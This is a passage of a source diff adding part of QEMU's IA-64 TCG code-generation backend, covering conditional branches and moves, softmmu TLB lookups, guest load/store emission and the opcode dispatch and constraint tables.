attention here to not modify the branch target by reading + the existing value and using it again. This ensure that caches and + memory are kept coherent during retranslation. */ + if (l->has_value) { + imm = l->u.value_ptr - s->code_ptr; + } else { + imm = get_reloc_pcrel21b_slot2(s->code_ptr); + tcg_out_reloc(s, s->code_ptr, R_IA64_PCREL21B, label_index, 0); + } + + tcg_out_bundle(s, miB, + INSN_NOP_M, + tcg_opc_cmp_a(TCG_REG_P0, cond, arg1, arg2, cmp4), + tcg_opc_b1(TCG_REG_P6, OPC_BR_DPTK_FEW_B1, imm)); +} + +static inline void tcg_out_setcond(TCGContext *s, TCGCond cond, TCGArg ret, + TCGArg arg1, TCGArg arg2, int cmp4) +{ + tcg_out_bundle(s, MmI, + tcg_opc_cmp_a(TCG_REG_P0, cond, arg1, arg2, cmp4), + tcg_opc_movi_a(TCG_REG_P6, ret, 1), + tcg_opc_movi_a(TCG_REG_P7, ret, 0)); +} + +static inline void tcg_out_movcond(TCGContext *s, TCGCond cond, TCGArg ret, + TCGArg c1, TCGArg c2, + TCGArg v1, int const_v1, + TCGArg v2, int const_v2, int cmp4) +{ + uint64_t opc1, opc2; + + if (const_v1) { + opc1 = tcg_opc_movi_a(TCG_REG_P6, ret, v1); + } else if (ret == v1) { + opc1 = INSN_NOP_M; + } else { + opc1 = tcg_opc_mov_a(TCG_REG_P6, ret, v1); + } + if (const_v2) { + opc2 = tcg_opc_movi_a(TCG_REG_P7, ret, v2); + } else if (ret == v2) { + opc2 = INSN_NOP_I; + } else { + opc2 = tcg_opc_mov_a(TCG_REG_P7, ret, v2); + } + + tcg_out_bundle(s, MmI, + tcg_opc_cmp_a(TCG_REG_P0, cond, c1, c2, cmp4), + opc1, + opc2); +} + +#if defined(CONFIG_SOFTMMU) +/* We're expecting to use an signed 22-bit immediate add. */ +QEMU_BUILD_BUG_ON(offsetof(CPUArchState, tlb_table[NB_MMU_MODES - 1][1]) + > 0x1fffff) + +/* Load and compare a TLB entry, and return the result in (p6, p7). + R2 is loaded with the addend TLB entry. + R57 is loaded with the address, zero extented on 32-bit targets. + R1, R3 are clobbered, leaving R56 free for... + BSWAP_1, BSWAP_2 and I-slot insns for swapping data for store. */ +static inline void tcg_out_qemu_tlb(TCGContext *s, TCGReg addr_reg, + TCGMemOp s_bits, int off_rw, int off_add, + uint64_t bswap1, uint64_t bswap2) +{ + /* + .mii + mov r2 = off_rw + extr.u r3 = addr_reg, ... # extract tlb page + zxt4 r57 = addr_reg # or mov for 64-bit guest + ;; + .mii + addl r2 = r2, areg0 + shl r3 = r3, cteb # via dep.z + dep r1 = 0, r57, ... # zero page ofs, keep align + ;; + .mmi + add r2 = r2, r3 + ;; + ld4 r3 = [r2], off_add-off_rw # or ld8 for 64-bit guest + nop + ;; + .mmi + nop + cmp.eq p6, p7 = r3, r58 + nop + ;; + */ + tcg_out_bundle(s, miI, + tcg_opc_movi_a(TCG_REG_P0, TCG_REG_R2, off_rw), + tcg_opc_i11(TCG_REG_P0, OPC_EXTR_U_I11, TCG_REG_R3, + addr_reg, TARGET_PAGE_BITS, CPU_TLB_BITS - 1), + tcg_opc_ext_i(TCG_REG_P0, + TARGET_LONG_BITS == 32 ? MO_UL : MO_Q, + TCG_REG_R57, addr_reg)); + tcg_out_bundle(s, miI, + tcg_opc_a1 (TCG_REG_P0, OPC_ADD_A1, TCG_REG_R2, + TCG_REG_R2, TCG_AREG0), + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, TCG_REG_R3, + TCG_REG_R3, 63 - CPU_TLB_ENTRY_BITS, + 63 - CPU_TLB_ENTRY_BITS), + tcg_opc_i14(TCG_REG_P0, OPC_DEP_I14, TCG_REG_R1, 0, + TCG_REG_R57, 63 - s_bits, + TARGET_PAGE_BITS - s_bits - 1)); + tcg_out_bundle(s, MmI, + tcg_opc_a1 (TCG_REG_P0, OPC_ADD_A1, + TCG_REG_R2, TCG_REG_R2, TCG_REG_R3), + tcg_opc_m3 (TCG_REG_P0, + (TARGET_LONG_BITS == 32 + ? OPC_LD4_M3 : OPC_LD8_M3), TCG_REG_R3, + TCG_REG_R2, off_add - off_rw), + bswap1); + tcg_out_bundle(s, mmI, + tcg_opc_m1 (TCG_REG_P0, OPC_LD8_M1, TCG_REG_R2, TCG_REG_R2), + tcg_opc_a6 (TCG_REG_P0, OPC_CMP_EQ_A6, TCG_REG_P6, + TCG_REG_P7, TCG_REG_R1, TCG_REG_R3), + bswap2); +} + +#define TCG_MAX_QEMU_LDST 640 + +typedef struct TCGLabelQemuLdst { + bool is_ld; + TCGMemOp size; + tcg_insn_unit *label_ptr; /* label pointers to be updated */ +} TCGLabelQemuLdst; + +typedef struct TCGBackendData { + int nb_ldst_labels; + TCGLabelQemuLdst ldst_labels[TCG_MAX_QEMU_LDST]; +} TCGBackendData; + +static inline void tcg_out_tb_init(TCGContext *s) +{ + s->be->nb_ldst_labels = 0; +} + +static void add_qemu_ldst_label(TCGContext *s, bool is_ld, TCGMemOp opc, + tcg_insn_unit *label_ptr) +{ + TCGBackendData *be = s->be; + TCGLabelQemuLdst *l = &be->ldst_labels[be->nb_ldst_labels++]; + + assert(be->nb_ldst_labels <= TCG_MAX_QEMU_LDST); + l->is_ld = is_ld; + l->size = opc & MO_SIZE; + l->label_ptr = label_ptr; +} + +static void tcg_out_tb_finalize(TCGContext *s) +{ + static const void * const helpers[8] = { + helper_ret_stb_mmu, + helper_le_stw_mmu, + helper_le_stl_mmu, + helper_le_stq_mmu, + helper_ret_ldub_mmu, + helper_le_lduw_mmu, + helper_le_ldul_mmu, + helper_le_ldq_mmu, + }; + tcg_insn_unit *thunks[8] = { }; + TCGBackendData *be = s->be; + size_t i, n = be->nb_ldst_labels; + + for (i = 0; i < n; i++) { + TCGLabelQemuLdst *l = &be->ldst_labels[i]; + long x = l->is_ld * 4 + l->size; + tcg_insn_unit *dest = thunks[x]; + + /* The out-of-line thunks are all the same; load the return address + from B0, load the GP, and branch to the code. Note that we are + always post-call, so the register window has rolled, so we're + using incomming parameter register numbers, not outgoing. */ + if (dest == NULL) { + uintptr_t *desc = (uintptr_t *)helpers[x]; + uintptr_t func = desc[0], gp = desc[1], disp; + + thunks[x] = dest = s->code_ptr; + + tcg_out_bundle(s, mlx, + INSN_NOP_M, + tcg_opc_l2 (gp), + tcg_opc_x2 (TCG_REG_P0, OPC_MOVL_X2, + TCG_REG_R1, gp)); + tcg_out_bundle(s, mii, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i22(TCG_REG_P0, OPC_MOV_I22, + l->is_ld ? TCG_REG_R35 : TCG_REG_R36, + TCG_REG_B0)); + disp = (tcg_insn_unit *)func - s->code_ptr; + tcg_out_bundle(s, mLX, + INSN_NOP_M, + tcg_opc_l3 (disp), + tcg_opc_x3 (TCG_REG_P0, OPC_BRL_SPTK_MANY_X3, disp)); + } + + reloc_pcrel21b_slot2(l->label_ptr, dest); + } +} + +static inline void tcg_out_qemu_ld(TCGContext *s, const TCGArg *args) +{ + static const uint64_t opc_ld_m1[4] = { + OPC_LD1_M1, OPC_LD2_M1, OPC_LD4_M1, OPC_LD8_M1 + }; + int addr_reg, data_reg, mem_index; + TCGMemOp opc, s_bits; + uint64_t fin1, fin2; + tcg_insn_unit *label_ptr; + + data_reg = args[0]; + addr_reg = args[1]; + opc = args[2]; + mem_index = args[3]; + s_bits = opc & MO_SIZE; + + /* Read the TLB entry */ + tcg_out_qemu_tlb(s, addr_reg, s_bits, + offsetof(CPUArchState, tlb_table[mem_index][0].addr_read), + offsetof(CPUArchState, tlb_table[mem_index][0].addend), + INSN_NOP_I, INSN_NOP_I); + + /* P6 is the fast path, and P7 the slow path */ + + fin2 = 0; + if (opc & MO_BSWAP) { + fin1 = tcg_opc_bswap64_i(TCG_REG_P0, data_reg, TCG_REG_R8); + if (s_bits < MO_64) { + int shift = 64 - (8 << s_bits); + fin2 = (opc & MO_SIGN ? OPC_EXTR_I11 : OPC_EXTR_U_I11); + fin2 = tcg_opc_i11(TCG_REG_P0, fin2, + data_reg, data_reg, shift, 63 - shift); + } + } else { + fin1 = tcg_opc_ext_i(TCG_REG_P0, opc, data_reg, TCG_REG_R8); + } + + tcg_out_bundle(s, mmI, + tcg_opc_mov_a(TCG_REG_P7, TCG_REG_R56, TCG_AREG0), + tcg_opc_a1 (TCG_REG_P6, OPC_ADD_A1, TCG_REG_R2, + TCG_REG_R2, TCG_REG_R57), + tcg_opc_movi_a(TCG_REG_P7, TCG_REG_R58, mem_index)); + label_ptr = s->code_ptr; + tcg_out_bundle(s, miB, + tcg_opc_m1 (TCG_REG_P6, opc_ld_m1[s_bits], + TCG_REG_R8, TCG_REG_R2), + INSN_NOP_I, + tcg_opc_b3 (TCG_REG_P7, OPC_BR_CALL_SPNT_FEW_B3, TCG_REG_B0, + get_reloc_pcrel21b_slot2(label_ptr))); + + add_qemu_ldst_label(s, 1, opc, label_ptr); + + /* Note that we always use LE helper functions, so the bswap insns + here for the fast path also apply to the slow path. */ + tcg_out_bundle(s, (fin2 ? mII : miI), + INSN_NOP_M, + fin1, + fin2 ? fin2 : INSN_NOP_I); +} + +static inline void tcg_out_qemu_st(TCGContext *s, const TCGArg *args) +{ + static const uint64_t opc_st_m4[4] = { + OPC_ST1_M4, OPC_ST2_M4, OPC_ST4_M4, OPC_ST8_M4 + }; + TCGReg addr_reg, data_reg; + int mem_index; + uint64_t pre1, pre2; + TCGMemOp opc, s_bits; + tcg_insn_unit *label_ptr; + + data_reg = args[0]; + addr_reg = args[1]; + opc = args[2]; + mem_index = args[3]; + s_bits = opc & MO_SIZE; + + /* Note that we always use LE helper functions, so the bswap insns + that are here for the fast path also apply to the slow path, + and move the data into the argument register. */ + pre2 = INSN_NOP_I; + if (opc & MO_BSWAP) { + pre1 = tcg_opc_bswap64_i(TCG_REG_P0, TCG_REG_R58, data_reg); + if (s_bits < MO_64) { + int shift = 64 - (8 << s_bits); + pre2 = tcg_opc_i11(TCG_REG_P0, OPC_EXTR_U_I11, + TCG_REG_R58, TCG_REG_R58, shift, 63 - shift); + } + } else { + /* Just move the data into place for the slow path. */ + pre1 = tcg_opc_ext_i(TCG_REG_P0, opc, TCG_REG_R58, data_reg); + } + + tcg_out_qemu_tlb(s, addr_reg, s_bits, + offsetof(CPUArchState, tlb_table[mem_index][0].addr_write), + offsetof(CPUArchState, tlb_table[mem_index][0].addend), + pre1, pre2); + + /* P6 is the fast path, and P7 the slow path */ + tcg_out_bundle(s, mmI, + tcg_opc_mov_a(TCG_REG_P7, TCG_REG_R56, TCG_AREG0), + tcg_opc_a1 (TCG_REG_P6, OPC_ADD_A1, TCG_REG_R2, + TCG_REG_R2, TCG_REG_R57), + tcg_opc_movi_a(TCG_REG_P7, TCG_REG_R59, mem_index)); + label_ptr = s->code_ptr; + tcg_out_bundle(s, miB, + tcg_opc_m4 (TCG_REG_P6, opc_st_m4[s_bits], + TCG_REG_R58, TCG_REG_R2), + INSN_NOP_I, + tcg_opc_b3 (TCG_REG_P7, OPC_BR_CALL_SPNT_FEW_B3, TCG_REG_B0, + get_reloc_pcrel21b_slot2(label_ptr))); + + add_qemu_ldst_label(s, 0, opc, label_ptr); +} + +#else /* !CONFIG_SOFTMMU */ +# include "tcg-be-null.h" + +static inline void tcg_out_qemu_ld(TCGContext *s, const TCGArg *args) +{ + static uint64_t const opc_ld_m1[4] = { + OPC_LD1_M1, OPC_LD2_M1, OPC_LD4_M1, OPC_LD8_M1 + }; + int addr_reg, data_reg; + TCGMemOp opc, s_bits, bswap; + + data_reg = args[0]; + addr_reg = args[1]; + opc = args[2]; + s_bits = opc & MO_SIZE; + bswap = opc & MO_BSWAP; + +#if TARGET_LONG_BITS == 32 + if (GUEST_BASE != 0) { + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_i29(TCG_REG_P0, OPC_ZXT4_I29, + TCG_REG_R3, addr_reg), + tcg_opc_a1 (TCG_REG_P0, OPC_ADD_A1, TCG_REG_R2, + TCG_GUEST_BASE_REG, TCG_REG_R3)); + } else { + tcg_out_bundle(s, miI, + INSN_NOP_M, + tcg_opc_i29(TCG_REG_P0, OPC_ZXT4_I29, + TCG_REG_R2, addr_reg), + INSN_NOP_I); + } + + if (!bswap) { + if (!(opc & MO_SIGN)) { + tcg_out_bundle(s, miI, + tcg_opc_m1 (TCG_REG_P0, opc_ld_m1[s_bits], + data_reg, TCG_REG_R2), + INSN_NOP_I, + INSN_NOP_I); + } else { + tcg_out_bundle(s, mII, + tcg_opc_m1 (TCG_REG_P0, opc_ld_m1[s_bits], + data_reg, TCG_REG_R2), + INSN_NOP_I, + tcg_opc_ext_i(TCG_REG_P0, opc, data_reg, data_reg)); + } + } else if (s_bits == MO_64) { + tcg_out_bundle(s, mII, + tcg_opc_m1 (TCG_REG_P0, opc_ld_m1[s_bits], + data_reg, TCG_REG_R2), + INSN_NOP_I, + tcg_opc_bswap64_i(TCG_REG_P0, data_reg, data_reg)); + } else { + if (s_bits == MO_16) { + tcg_out_bundle(s, mII, + tcg_opc_m1 (TCG_REG_P0, opc_ld_m1[s_bits], + data_reg, TCG_REG_R2), + INSN_NOP_I, + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, + data_reg, data_reg, 15, 15)); + } else { + tcg_out_bundle(s, mII, + tcg_opc_m1 (TCG_REG_P0, opc_ld_m1[s_bits], + data_reg, TCG_REG_R2), + INSN_NOP_I, + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, + data_reg, data_reg, 31, 31)); + } + if (!(opc & MO_SIGN)) { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_bswap64_i(TCG_REG_P0, data_reg, data_reg)); + } else { + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_bswap64_i(TCG_REG_P0, data_reg, data_reg), + tcg_opc_ext_i(TCG_REG_P0, opc, data_reg, data_reg)); + } + } +#else + if (GUEST_BASE != 0) { + tcg_out_bundle(s, MmI, + tcg_opc_a1 (TCG_REG_P0, OPC_ADD_A1, TCG_REG_R2, + TCG_GUEST_BASE_REG, addr_reg), + tcg_opc_m1 (TCG_REG_P0, opc_ld_m1[s_bits], + data_reg, TCG_REG_R2), + INSN_NOP_I); + } else { + tcg_out_bundle(s, mmI, + INSN_NOP_M, + tcg_opc_m1 (TCG_REG_P0, opc_ld_m1[s_bits], + data_reg, addr_reg), + INSN_NOP_I); + } + + if (bswap && s_bits == MO_16) { + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, + data_reg, data_reg, 15, 15), + tcg_opc_bswap64_i(TCG_REG_P0, data_reg, data_reg)); + } else if (bswap && s_bits == MO_32) { + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, + data_reg, data_reg, 31, 31), + tcg_opc_bswap64_i(TCG_REG_P0, data_reg, data_reg)); + } else if (bswap && s_bits == MO_64) { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_bswap64_i(TCG_REG_P0, data_reg, data_reg)); + } + if (opc & MO_SIGN) { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_ext_i(TCG_REG_P0, opc, data_reg, data_reg)); + } +#endif +} + +static inline void tcg_out_qemu_st(TCGContext *s, const TCGArg *args) +{ + static uint64_t const opc_st_m4[4] = { + OPC_ST1_M4, OPC_ST2_M4, OPC_ST4_M4, OPC_ST8_M4 + }; + int addr_reg, data_reg; +#if TARGET_LONG_BITS == 64 + uint64_t add_guest_base; +#endif + TCGMemOp opc, s_bits, bswap; + + data_reg = args[0]; + addr_reg = args[1]; + opc = args[2]; + s_bits = opc & MO_SIZE; + bswap = opc & MO_BSWAP; + +#if TARGET_LONG_BITS == 32 + if (GUEST_BASE != 0) { + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_i29(TCG_REG_P0, OPC_ZXT4_I29, + TCG_REG_R3, addr_reg), + tcg_opc_a1 (TCG_REG_P0, OPC_ADD_A1, TCG_REG_R2, + TCG_GUEST_BASE_REG, TCG_REG_R3)); + } else { + tcg_out_bundle(s, miI, + INSN_NOP_M, + tcg_opc_i29(TCG_REG_P0, OPC_ZXT4_I29, + TCG_REG_R2, addr_reg), + INSN_NOP_I); + } + + if (bswap) { + if (s_bits == MO_16) { + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, + TCG_REG_R3, data_reg, 15, 15), + tcg_opc_bswap64_i(TCG_REG_P0, + TCG_REG_R3, TCG_REG_R3)); + data_reg = TCG_REG_R3; + } else if (s_bits == MO_32) { + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, + TCG_REG_R3, data_reg, 31, 31), + tcg_opc_bswap64_i(TCG_REG_P0, + TCG_REG_R3, TCG_REG_R3)); + data_reg = TCG_REG_R3; + } else if (s_bits == MO_64) { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_bswap64_i(TCG_REG_P0, TCG_REG_R3, data_reg)); + data_reg = TCG_REG_R3; + } + } + tcg_out_bundle(s, mmI, + tcg_opc_m4 (TCG_REG_P0, opc_st_m4[s_bits], + data_reg, TCG_REG_R2), + INSN_NOP_M, + INSN_NOP_I); +#else + if (GUEST_BASE != 0) { + add_guest_base = tcg_opc_a1 (TCG_REG_P0, OPC_ADD_A1, TCG_REG_R2, + TCG_GUEST_BASE_REG, addr_reg); + addr_reg = TCG_REG_R2; + } else { + add_guest_base = INSN_NOP_M; + } + + if (!bswap) { + tcg_out_bundle(s, (GUEST_BASE ? MmI : mmI), + add_guest_base, + tcg_opc_m4 (TCG_REG_P0, opc_st_m4[s_bits], + data_reg, addr_reg), + INSN_NOP_I); + } else { + if (s_bits == MO_16) { + tcg_out_bundle(s, mII, + add_guest_base, + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, + TCG_REG_R3, data_reg, 15, 15), + tcg_opc_bswap64_i(TCG_REG_P0, + TCG_REG_R3, TCG_REG_R3)); + data_reg = TCG_REG_R3; + } else if (s_bits == MO_32) { + tcg_out_bundle(s, mII, + add_guest_base, + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, + TCG_REG_R3, data_reg, 31, 31), + tcg_opc_bswap64_i(TCG_REG_P0, + TCG_REG_R3, TCG_REG_R3)); + data_reg = TCG_REG_R3; + } else if (s_bits == MO_64) { + tcg_out_bundle(s, miI, + add_guest_base, + INSN_NOP_I, + tcg_opc_bswap64_i(TCG_REG_P0, TCG_REG_R3, data_reg)); + data_reg = TCG_REG_R3; + } + tcg_out_bundle(s, miI, + tcg_opc_m4 (TCG_REG_P0, opc_st_m4[s_bits], + data_reg, addr_reg), + INSN_NOP_I, + INSN_NOP_I); + } +#endif +} + +#endif + +static inline void tcg_out_op(TCGContext *s, TCGOpcode opc, + const TCGArg *args, const int *const_args) +{ + switch(opc) { + case INDEX_op_exit_tb: + tcg_out_exit_tb(s, args[0]); + break; + case INDEX_op_br: + tcg_out_br(s, args[0]); + break; + case INDEX_op_goto_tb: + tcg_out_goto_tb(s, args[0]); + break; + + case INDEX_op_ld8u_i32: + case INDEX_op_ld8u_i64: + tcg_out_ld_rel(s, OPC_LD1_M1, args[0], args[1], args[2]); + break; + case INDEX_op_ld8s_i32: + case INDEX_op_ld8s_i64: + tcg_out_ld_rel(s, OPC_LD1_M1, args[0], args[1], args[2]); + tcg_out_ext(s, OPC_SXT1_I29, args[0], args[0]); + break; + case INDEX_op_ld16u_i32: + case INDEX_op_ld16u_i64: + tcg_out_ld_rel(s, OPC_LD2_M1, args[0], args[1], args[2]); + break; + case INDEX_op_ld16s_i32: + case INDEX_op_ld16s_i64: + tcg_out_ld_rel(s, OPC_LD2_M1, args[0], args[1], args[2]); + tcg_out_ext(s, OPC_SXT2_I29, args[0], args[0]); + break; + case INDEX_op_ld_i32: + case INDEX_op_ld32u_i64: + tcg_out_ld_rel(s, OPC_LD4_M1, args[0], args[1], args[2]); + break; + case INDEX_op_ld32s_i64: + tcg_out_ld_rel(s, OPC_LD4_M1, args[0], args[1], args[2]); + tcg_out_ext(s, OPC_SXT4_I29, args[0], args[0]); + break; + case INDEX_op_ld_i64: + tcg_out_ld_rel(s, OPC_LD8_M1, args[0], args[1], args[2]); + break; + case INDEX_op_st8_i32: + case INDEX_op_st8_i64: + tcg_out_st_rel(s, OPC_ST1_M4, args[0], args[1], args[2]); + break; + case INDEX_op_st16_i32: + case INDEX_op_st16_i64: + tcg_out_st_rel(s, OPC_ST2_M4, args[0], args[1], args[2]); + break; + case INDEX_op_st_i32: + case INDEX_op_st32_i64: + tcg_out_st_rel(s, OPC_ST4_M4, args[0], args[1], args[2]); + break; + case INDEX_op_st_i64: + tcg_out_st_rel(s, OPC_ST8_M4, args[0], args[1], args[2]); + break; + + case INDEX_op_add_i32: + case INDEX_op_add_i64: + tcg_out_add(s, args[0], args[1], args[2], const_args[2]); + break; + case INDEX_op_sub_i32: + case INDEX_op_sub_i64: + tcg_out_sub(s, args[0], args[1], const_args[1], args[2], const_args[2]); + break; + + case INDEX_op_and_i32: + case INDEX_op_and_i64: + /* TCG expects arg2 constant; A3 expects arg1 constant. Swap. */ + tcg_out_alu(s, OPC_AND_A1, OPC_AND_A3, args[0], + args[2], const_args[2], args[1], const_args[1]); + break; + case INDEX_op_andc_i32: + case INDEX_op_andc_i64: + tcg_out_alu(s, OPC_ANDCM_A1, OPC_ANDCM_A3, args[0], + args[1], const_args[1], args[2], const_args[2]); + break; + case INDEX_op_eqv_i32: + case INDEX_op_eqv_i64: + tcg_out_eqv(s, args[0], args[1], const_args[1], + args[2], const_args[2]); + break; + case INDEX_op_nand_i32: + case INDEX_op_nand_i64: + tcg_out_nand(s, args[0], args[1], const_args[1], + args[2], const_args[2]); + break; + case INDEX_op_nor_i32: + case INDEX_op_nor_i64: + tcg_out_nor(s, args[0], args[1], const_args[1], + args[2], const_args[2]); + break; + case INDEX_op_or_i32: + case INDEX_op_or_i64: + /* TCG expects arg2 constant; A3 expects arg1 constant. Swap. */ + tcg_out_alu(s, OPC_OR_A1, OPC_OR_A3, args[0], + args[2], const_args[2], args[1], const_args[1]); + break; + case INDEX_op_orc_i32: + case INDEX_op_orc_i64: + tcg_out_orc(s, args[0], args[1], const_args[1], + args[2], const_args[2]); + break; + case INDEX_op_xor_i32: + case INDEX_op_xor_i64: + /* TCG expects arg2 constant; A3 expects arg1 constant. Swap. */ + tcg_out_alu(s, OPC_XOR_A1, OPC_XOR_A3, args[0], + args[2], const_args[2], args[1], const_args[1]); + break; + + case INDEX_op_mul_i32: + case INDEX_op_mul_i64: + tcg_out_mul(s, args[0], args[1], args[2]); + break; + + case INDEX_op_sar_i32: + tcg_out_sar_i32(s, args[0], args[1], args[2], const_args[2]); + break; + case INDEX_op_sar_i64: + tcg_out_sar_i64(s, args[0], args[1], args[2], const_args[2]); + break; + case INDEX_op_shl_i32: + tcg_out_shl_i32(s, args[0], args[1], args[2], const_args[2]); + break; + case INDEX_op_shl_i64: + tcg_out_shl_i64(s, args[0], args[1], args[2], const_args[2]); + break; + case INDEX_op_shr_i32: + tcg_out_shr_i32(s, args[0], args[1], args[2], const_args[2]); + break; + case INDEX_op_shr_i64: + tcg_out_shr_i64(s, args[0], args[1], args[2], const_args[2]); + break; + case INDEX_op_rotl_i32: + tcg_out_rotl_i32(s, args[0], args[1], args[2], const_args[2]); + break; + case INDEX_op_rotl_i64: + tcg_out_rotl_i64(s, args[0], args[1], args[2], const_args[2]); + break; + case INDEX_op_rotr_i32: + tcg_out_rotr_i32(s, args[0], args[1], args[2], const_args[2]); + break; + case INDEX_op_rotr_i64: + tcg_out_rotr_i64(s, args[0], args[1], args[2], const_args[2]); + break; + + case INDEX_op_ext8s_i32: + case INDEX_op_ext8s_i64: + tcg_out_ext(s, OPC_SXT1_I29, args[0], args[1]); + break; + case INDEX_op_ext8u_i32: + case INDEX_op_ext8u_i64: + tcg_out_ext(s, OPC_ZXT1_I29, args[0], args[1]); + break; + case INDEX_op_ext16s_i32: + case INDEX_op_ext16s_i64: + tcg_out_ext(s, OPC_SXT2_I29, args[0], args[1]); + break; + case INDEX_op_ext16u_i32: + case INDEX_op_ext16u_i64: + tcg_out_ext(s, OPC_ZXT2_I29, args[0], args[1]); + break; + case INDEX_op_ext32s_i64: + tcg_out_ext(s, OPC_SXT4_I29, args[0], args[1]); + break; + case INDEX_op_ext32u_i64: + tcg_out_ext(s, OPC_ZXT4_I29, args[0], args[1]); + break; + + case INDEX_op_bswap16_i32: + case INDEX_op_bswap16_i64: + tcg_out_bswap16(s, args[0], args[1]); + break; + case INDEX_op_bswap32_i32: + case INDEX_op_bswap32_i64: + tcg_out_bswap32(s, args[0], args[1]); + break; + case INDEX_op_bswap64_i64: + tcg_out_bswap64(s, args[0], args[1]); + break; + + case INDEX_op_deposit_i32: + case INDEX_op_deposit_i64: + tcg_out_deposit(s, args[0], args[1], args[2], const_args[2], + args[3], args[4]); + break; + + case INDEX_op_brcond_i32: + tcg_out_brcond(s, args[2], args[0], args[1], args[3], 1); + break; + case INDEX_op_brcond_i64: + tcg_out_brcond(s, args[2], args[0], args[1], args[3], 0); + break; + case INDEX_op_setcond_i32: + tcg_out_setcond(s, args[3], args[0], args[1], args[2], 1); + break; + case INDEX_op_setcond_i64: + tcg_out_setcond(s, args[3], args[0], args[1], args[2], 0); + break; + case INDEX_op_movcond_i32: + tcg_out_movcond(s, args[5], args[0], args[1], args[2], + args[3], const_args[3], args[4], const_args[4], 1); + break; + case INDEX_op_movcond_i64: + tcg_out_movcond(s, args[5], args[0], args[1], args[2], + args[3], const_args[3], args[4], const_args[4], 0); + break; + + case INDEX_op_qemu_ld_i32: + tcg_out_qemu_ld(s, args); + break; + case INDEX_op_qemu_ld_i64: + tcg_out_qemu_ld(s, args); + break; + case INDEX_op_qemu_st_i32: + tcg_out_qemu_st(s, args); + break; + case INDEX_op_qemu_st_i64: + tcg_out_qemu_st(s, args); + break; + + case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ + case INDEX_op_mov_i64: + case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ + case INDEX_op_movi_i64: + case INDEX_op_call: /* Always emitted via tcg_out_call. */ + default: + tcg_abort(); + } +} + +static const TCGTargetOpDef ia64_op_defs[] = { + { INDEX_op_br, { } }, + { INDEX_op_exit_tb, { } }, + { INDEX_op_goto_tb, { } }, + + { INDEX_op_ld8u_i32, { "r", "r" } }, + { INDEX_op_ld8s_i32, { "r", "r" } }, + { INDEX_op_ld16u_i32, { "r", "r" } }, + { INDEX_op_ld16s_i32, { "r", "r" } }, + { INDEX_op_ld_i32, { "r", "r" } }, + { INDEX_op_st8_i32, { "rZ", "r" } }, + { INDEX_op_st16_i32, { "rZ", "r" } }, + { INDEX_op_st_i32, { "rZ", "r" } }, + + { INDEX_op_add_i32, { "r", "rZ", "rI" } }, + { INDEX_op_sub_i32, { "r", "rI", "rI" } }, + + { INDEX_op_and_i32, { "r", "rI", "rI" } }, + { INDEX_op_andc_i32, { "r", "rI", "rI" } }, + { INDEX_op_eqv_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_nand_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_nor_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_or_i32, { "r", "rI", "rI" } }, + { INDEX_op_orc_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_xor_i32, { "r", "rI", "rI" } }, + + { INDEX_op_mul_i32, { "r", "rZ", "rZ" } }, + + { INDEX_op_sar_i32, { "r", "rZ", "ri" } }, + { INDEX_op_shl_i32, { "r", "rZ", "ri" } }, + { INDEX_op_shr_i32, { "r", "rZ", "ri" } }, + { INDEX_op_rotl_i32, { "r", "rZ", "ri" } }, + { INDEX_op_rotr_i32, { "r", "rZ", "ri" } }, + + { INDEX_op_ext8s_i32, { "r", "rZ"} }, + { INDEX_op_ext8u_i32, { "r", "rZ"} }, + { INDEX_op_ext16s_i32, { "r", "rZ"} }, + { INDEX_op_ext16u_i32, { "r", "rZ"} }, + + { INDEX_op_bswap16_i32, { "r", "rZ" } }, + { INDEX_op_bswap32_i32, { "r", "rZ" } }, + + { INDEX_op_brcond_i32, { "rZ", "rZ" } }, + { INDEX_op_setcond_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_movcond_i32, { "r", "rZ", "rZ", "rI", "rI" } }, + + { INDEX_op_ld8u_i64, { "r", "r" } }, + { INDEX_op_ld8s_i64, { "r", "r" } }, + { INDEX_op_ld16u_i64, { "r", "r" } }, + { INDEX_op_ld16s_i64, { "r", "r" } }, + { INDEX_op_ld32u_i64, { "r", "r" } }, + { INDEX_op_ld32s_i64, { "r", "r" } }, + { INDEX_op_ld_i64, { "r", "r" } }, + { INDEX_op_st8_i64, { "rZ", "r" } }, + { INDEX_op_st16_i64, { "rZ", "r" } }, + { INDEX_op_st32_i64, { "rZ", "r" } }, + { INDEX_op_st_i64, { "rZ", "r" } }, + + { INDEX_op_add_i64, { "r", "rZ", "rI" } }, + { INDEX_op_sub_i64, { "r", "rI", "rI" } }, + + { INDEX_op_and_i64, { "r", "rI", "rI" } }, + { INDEX_op_andc_i64, { "r", "rI", "rI" } }, + { INDEX_op_eqv_i64, { "r", "rZ", "rZ" } }, + { INDEX_op_nand_i64, { "r", "rZ", "rZ" } }, + { INDEX_op_nor_i64, { "r", "rZ", "rZ" } }, + { INDEX_op_or_i64, { "r", "rI", "rI" } }, + { INDEX_op_orc_i64, { "r", "rZ", "rZ" } }, + { 